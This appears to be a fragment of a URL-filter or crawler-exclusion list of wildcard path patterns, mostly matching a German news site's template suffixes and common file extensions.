*._responsive.poll.detail.form.html
*._responsive.poll.detail.html
*._responsive.poll.html
*._responsive.portalheader.html
*._responsive.presentation.html
*._responsive.presentation.pagelinks.html
*._responsive.reload_button.html
*._responsive.revive.html
*._responsive.search.html
*._responsive.search.lucene.html
*._responsive.search.lucene.pagenav.html
*._responsive.search.lucene.searchform.html
*._responsive.stdinclude.html
*._responsive.submenu_list.blocks.html
*._responsive.submenu_list.html
*._responsive.tagsearch.html
*._responsive.tagsearch.output.html
*._responsive.tagsearch.output.table.html
*._responsive.tagsearch.searchform.html
*._responsive.themes.appetizer_list.html
*._responsive.themes.html
*._responsive.themes.navi.html
*._responsive.themes.pagenav.html
*._responsive.themes.tag_list.html
*._responsive.tracking.html
*._responsive.tracking.ivw.html
*._responsive.widgets.feed.html
*._responsive.widgets.html
*._responsive.widgets.json.brochures.html
*._responsive.widgets.json.digcms.html
*._responsive.widgets.json.html
*._responsive.widgets.json.weather.html
*._responsive.widgets.json.yumpu.html
*._yahoo.html
*._yahoo.media.html
*.adaddress.html
*.additional.html
*.addtags.html
*.adserver.html
*.adshop.adslot.html
*.adshop.html
*.adshop.teaser.html
*.adslots.html
*.adtags.html
*.advertisement.html
*.advertisement.openx.html
*.advertorial.html
*.air.html
*.all_articles.html
*.alpregio.html
*.appetizerbig.html
*.appetizersmall.html
*.article.html
*.articlead.html
*.ashx$
*.asmx
*.asmx$
*.asmx*
*.asp
*.asp$
*.asp*
*.aspx
*.aspx$
*.aspx*
*.atom
*.avi$
*.axd
*.axd$
*.bak
*.big.html
*.big.v2.html
*.bigpicture.html
*.bigpicture.v2.html
*.billboardad.html
*.blank.gif.html
*.block.html
*.block.v2.html
*.blocks.html
*.bmp$
*.bottomad.html
*.breakingnews.html
*.categoryarticle.html
*.cfm
*.cgi
*.cgi$
*.closedhand.cur.html
*.comments.html
*.comments.v2.html
*.common.html
*.common.iframe.html
*.common.static.html
*.common.urlinclude.html
*.community.facebook.html
*.community.foren.html
*.community.google_plus.html
*.community.html
*.community.twitter.html
*.community.weblogs.html
*.config$
*.contentad.html
*.contentheaderad.html
*.contilla.html
*.csi
*.css$
*.csv
*.csv$
*.customfeed.html
*.customfeed.input.html
*.customfeed.input.withsync.html
*.customfeed.output.html
*.customfeed.sitestat.html
*.customfeed.teaser.html
*.cvs
*.db
*.dll$
*.do
*.doc
*.doc$
*.docx
*.docx$
*.dynamic.html
*.dynamicsorted.html
*.ece
*.ece*
*.editform.html
*.editpanel.html
*.editpanelentry.html
*.eidos.html
*.email.html
*.embed.comments.form.captcha.html
*.embed.comments.form.html
*.embed.comments.html
*.embed.comments.list.html
*.embed.html
*.embed.image.html
*.embed.image.scroll.html
*.embed.media.html
*.embed.rating.html
*.embed.text.html
*.epaper.html
*.exe
*.exe$
*.extcontent.html
*.extcontentteaser.html
*.fileinclude.html
*.first_promo_ad.html
*.first_promoad.html
*.flirtsndates.horizontal.html
*.flirtsndates.horizontal.v2.html
*.flirtsndates.html
*.flirtsndates.people.html
*.flirtsndates.v2.html
*.flv$
*.footer.html
*.footerad.html
*.fullrss
*.gallery.html
*.gallery.showifnotvideo.html
*.gallery.showifvideo.html
*.galleryad.html
*.gif
*.gif$
*.gif/
*.git$
*.global_includes.html
*.global_includes.oms.html
*.global_includes.oms.oms_async_old.html
*.googlemaps.html
*.gz
*.gz$
*.head.html
*.header.html
*.header.photogallery.html
*.hitcount.html
*.hitlists.html
*.hitlists.v2.html
*.home_ressort.html
*.htm
*.htm$
*.html
*.html$
*.html.html
*.html.html.html
*.html.printable
*.html/$
*.html=$
*.html?
*.icon.comments.html
*.icon.comments.v2.html
*.icon.html
*.icon.media.html
*.icon.media.v2.html
*.icon_arrow_left.png.html
*.icon_arrow_right.png.html
*.icon_move.png.html
*.icon_remove.png.html
*.icon_settings.png.html
*.ics$
*.idea$
*.image.html
*.image.normalized.html
*.image.preview.html
*.image.thumbnail.html
*.inc
*.inc$
*.interactive.html
*.interactive.slider.html
*.isuu.html
*.ivw.adaudieneceblock.html
*.ivw.html
*.jpeg$
*.jpg$
*.js
*.js$
*.json
*.json$
*.jsp
*.jsp$
*.jsp/
*.jsv
*.jsw
*.jws
*.kicker_headline.html
*.kino.html
*.large_rectangle.html
*.layoutjsdefinitions.html
*.leserfotos.html
*.liveticker.html
*.liveticker.tag.html
*.loading.gif.html
*.loading_horizontal.gif.html
*.mail.html
*.markets.html
*.media.html
*.media.video.html
*.media.video.sidebar.html
*.media.video.sidebar.v2.html
*.mobile.advertisement.html
*.mobile.big.html
*.mobile.bottomad.html
*.mobile.contentad.html
*.mobile.footerad.html
*.mobile.html
*.mobile.icon.comments.html
*.mobile.icon.html
*.mobile.icon.media.html
*.mobile.initad.html
*.mobile.navigation.footer.html
*.mobile.navigation.header.html
*.mobile.navigation.html
*.mobile.presentation.articlelinks.html
*.mobile.presentation.head.html
*.mobile.presentation.html
*.mobile.presentation.media.html
*.mobile.presentation.media.photogallery.ajax.html
*.mobile.presentation.media.photogallery.html
*.mobile.presentation.media.video.html
*.mobile.presentation.relatedarticles.html
*.mobile.presentation.relatedthemes.html
*.mobile.presentation.socialbar.html
*.mobile.render_special.html
*.mobile.ressort_teaser.html
*.mobile.search.fast.html
*.mobile.search.html
*.mobile.search.input.html
*.mobile.search.lucene.html
*.mobile.skyscraper.html
*.mobile.small.html
*.mobile.standalone.footer.html
*.mobile.standalone.header.html
*.mobile.standalone.html
*.mobile.superbanner.html
*.mobile.text.html
*.mobile.themenarticlelist.html
*.mobile.themenarticles.html
*.mobile.themennavi.html
*.mobile.thementags.html
*.mobile.topteaser.html
*.mobile.topteaser.standard.html
*.mobile.twinredirect.html
*.mobile.userregteaser.html
*.mobile_big.html
*.mobile_global.html
*.mobile_medium.html
*.mobile_small.html
*.mp3$
*.mp4$
*.multicolumn.html
*.multimedia.html
*.navigation.html
*.navigation.myplace.html
*.ncl_teaser.html
*.newsarchiv.html
*.newsarchiv.navigation.html
*.newsticker.html
*.newsticker.v2.html
*.openhand.cur.html
*.openx.html
*.openxext.html
*.outofpage.html
*.pagination.png.html
*.paid.html
*.param_test.html
*.paramredirect.html
*.pay.channeltree.html
*.pay.channeltree.v1.html
*.pay.channeltree.v1.json.groovy.html
*.pay.html
*.pdf
*.pdf$
*.pdf?properties=*
*.personalization.article.html
*.personalization.html
*.personalization.startinfo.html
*.personalization.widgets.html
*.personalization.widgets.json.groovy.html
*.personalization.widgetsearch.html
*.php
*.php$
*.php*
*.php